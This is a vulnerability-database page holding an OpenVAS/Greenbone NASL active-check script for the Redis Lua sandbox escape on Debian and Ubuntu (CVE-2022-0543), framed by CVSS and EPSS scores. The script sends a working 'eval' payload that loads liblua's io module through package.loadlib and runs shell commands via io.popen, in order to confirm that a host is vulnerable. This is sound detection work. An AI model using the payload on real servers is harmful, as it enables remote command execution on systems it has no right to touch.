10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
9.9 High
AI Score
Confidence
High
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.971 High
EPSS
Percentile
99.8%
Redis is prone to a remote code execution (RCE) vulnerability.
# Copyright (C) 2022 Greenbone Networks GmbH
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-or-later
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
CPE = "cpe:/a:redis:redis";
if (description)
{
script_oid("1.3.6.1.4.1.25623.1.0.148029");
script_version("2022-08-09T10:11:17+0000");
script_tag(name:"last_modification", value:"2022-08-09 10:11:17 +0000 (Tue, 09 Aug 2022)");
script_tag(name:"creation_date", value:"2022-05-03 04:18:25 +0000 (Tue, 03 May 2022)");
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_tag(name:"severity_vector", value:"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H");
script_tag(name:"severity_origin", value:"NVD");
script_tag(name:"severity_date", value:"2022-03-09 02:03:00 +0000 (Wed, 09 Mar 2022)");
script_xref(name:"CISA", value:"Known Exploited Vulnerability (KEV) catalog");
script_xref(name:"URL", value:"https://www.cisa.gov/known-exploited-vulnerabilities-catalog");
script_cve_id("CVE-2022-0543");
script_tag(name:"qod_type", value:"exploit");
script_tag(name:"solution_type", value:"VendorFix");
script_name("Redis RCE Vulnerability (CVE-2022-0543) - Active Check");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2022 Greenbone Networks GmbH");
script_family("Databases");
script_dependencies("gb_redis_detect.nasl", "os_detection.nasl");
script_mandatory_keys("redis/installed", "Host/runs_unixoide");
script_require_ports("Services/redis", 6379);
script_tag(name:"summary", value:"Redis is prone to a remote code execution (RCE) vulnerability.");
script_tag(name:"insight", value:"It was discovered, that redis, a persistent key-value database,
due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result
in remote code execution.");
script_tag(name:"affected", value:"Redis on Debian and Debian-based systems like Ubuntu.");
script_tag(name:"solution", value:"Update to the latest version from your distribution.");
script_xref(name:"URL", value:"https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce");
script_xref(name:"URL", value:"https://lists.debian.org/debian-security-announce/2022/msg00048.html");
script_xref(name:"URL", value:"https://packetstormsecurity.com/files/166885/Redis-Lua-Sandbox-Escape.html");
script_xref(name:"URL", value:"https://www.debian.org/security/2022/dsa-5081");
script_xref(name:"URL", value:"https://ubuntu.com/security/notices/USN-5316-1");
exit(0);
}
include("host_details.inc");
include("port_service_func.inc");
include("misc_func.inc");
include("os_func.inc");
port = service_get_port(default: 6379, proto: "redis");
soc = open_sock_tcp(port);
if (!soc)
exit(0);
cmds = exploit_commands("linux");
# nb: File names taken from the following packages of buster and bullseye:
# - https://packages.debian.org/buster/liblua5.1-0
# - https://packages.debian.org/bullseye/liblua5.1-0
# File names are also the same on Ubuntu (checked on affected 20.04 and 21.10).
# Also note that "redis-tools" (which is a dependency of "redis-server") is having a dependency
# on "liblua5.1-0" on buster and bullseye so only the 5.1 file names (and not the 5.2 or 5.3 ones)
# are used in the list below.
libs = make_list("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0",
"/usr/lib/aarch64-linux-gnu/liblua5.1.so.0",
"/usr/lib/arm-linux-gnueabi/liblua5.1.so.0",
"/usr/lib/arm-linux-gnueabihf/liblua5.1.so.0",
"/usr/lib/i386-linux-gnu/liblua5.1.so.0",
"/usr/lib/mips-linux-gnu/liblua5.1.so.0", # nb: Only available on buster but not on bullseye
"/usr/lib/mips64el-linux-gnuabi64/liblua5.1.so.0",
"/usr/lib/mipsel-linux-gnu/liblua5.1.so.0",
"/usr/lib/powerpc64le-linux-gnu/liblua5.1.so.0",
"/usr/lib/s390x-linux-gnu/liblua5.1.so.0");
foreach pattern (keys(cmds)) {
cmd = cmds[pattern];
foreach lib (libs) {
payload = "eval 'local io_l = " + 'package.loadlib("' + lib +'",' +
' "luaopen_io"); local io = io_l(); local f = io.popen("' + cmd + '", "r");' +
' local res = f:read("*a"); f:close();' + " return res' 0" + '\r\n';
send(socket: soc, data: payload);
res = recv(socket: soc, length: 512);
if (egrep(pattern: pattern, string: res)) {
close(soc);
report = 'By doing the following request:\n\n' + payload + '\nit was possible to execute the "' + cmd + '" command.\n\nResult:\n\n' + chomp(res);
security_message(port: port, data: report);
exit(0);
}
}
}
close(soc);
exit(0); # Results depending on the architecture
lists.debian.org/debian-security-announce/2022/msg00048.html
packetstormsecurity.com/files/166885/Redis-Lua-Sandbox-Escape.html
ubuntu.com/security/notices/USN-5316-1
www.cisa.gov/known-exploited-vulnerabilities-catalog
www.debian.org/security/2022/dsa-5081
www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
Known Exploited Vulnerability (KEV) catalog
10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
9.9 High
AI Score
Confidence
High
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.971 High
EPSS
Percentile
99.8%